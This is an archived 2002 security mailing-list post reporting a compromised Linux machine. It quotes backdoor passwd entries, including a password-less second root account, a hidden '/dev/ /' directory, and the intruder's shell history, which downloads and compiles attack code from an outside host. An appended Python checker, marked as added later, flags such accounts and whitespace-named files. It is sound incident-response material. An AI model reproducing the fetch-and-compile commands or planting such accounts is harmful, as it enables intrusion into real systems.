watching them -after the fact

From: Alvin Oga (alvin.secat_private-Consulting.com)
Date: Sun Mar 24 2002 - 23:11:37 PST

    hi ya
    
    this machine does NOT have su, wget, gcc installed
    so they couldn't do much ???
    
    they also created an empty dir:  "/dev/ /"
            ( yes... a space as its filename )
    
    c ya
    alvin
    
    
    cat /etc/passwd
            ...
    
    -->>        karlin::1001:1001::/tmp:/bin/bash
    -->>        r00t::0:0::/tmp:/bin/bash
    
    
    cat /tmp/.bash_history
    ...
    su r00t
    su r00t
    sudo
    suidperl 
    uname -a
    w
    uname -a
    exit
    su r00t
    uname -a
    w
    exit
    w
    su r00t
    exit
    w
    su r00t
    exit
    wget turma85.hypermart.net/slice.c
    gcc -o sl slice.c 
    exit
    su r00t
    w
    exit
    #
    # end of history
    
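    The two artifacts in the post, a password-less UID 0 account in /etc/passwd and a directory whose name is a single space, are the sort of thing a post-incident sweep should flag mechanically. The following checker is an added example, not part of the original message; the passwd excerpt is constructed around the two lines quoted above, with ordinary filler entries added.

```python
import os

# Constructed /etc/passwd excerpt: the karlin and r00t lines are the ones quoted
# in the post, the others are ordinary filler entries.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alvin:x:1000:1000:Alvin:/home/alvin:/bin/bash
karlin::1001:1001::/tmp:/bin/bash
r00t::0:0::/tmp:/bin/bash
"""

def audit_passwd(text):
    """Return (user, reason) pairs for entries that look like backdoor accounts."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid, _gid, _gecos, home, _shell = fields
        if pw == "":                      # empty field: login needs no password
            findings.append((user, "empty password field"))
        if uid == "0" and user != "root": # second superuser account
            findings.append((user, "UID 0 account other than root"))
        if home == "/tmp" or home.startswith("/tmp/"):
            findings.append((user, "home directory under /tmp"))
    return findings

def odd_names(paths):
    """Paths whose last component is whitespace-only or whitespace-padded."""
    hits = []
    for p in paths:
        name = p.rstrip("/").rsplit("/", 1)[-1]
        if name and (name.isspace() or name != name.strip()):
            hits.append(p)
    return hits

def scan_tree(root):
    """Walk a directory tree and return entries with whitespace-padded names."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        found.extend(odd_names(os.path.join(dirpath, n) for n in dirnames + filenames))
    return found

if __name__ == "__main__":
    for user, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd: {user}: {reason}")
    # constructed listing modelled on the "/dev/ /" directory from the post
    print("odd names:", odd_names(["/dev/null", "/dev/ /", "/dev/ttyS0"]))
```

    Run scan_tree("/dev") or scan_tree("/") on a live host to apply the name check to the real filesystem.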
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
    This archive was generated by hypermail 2b30 : Mon Mar 25 2002 - 11:35:33 PST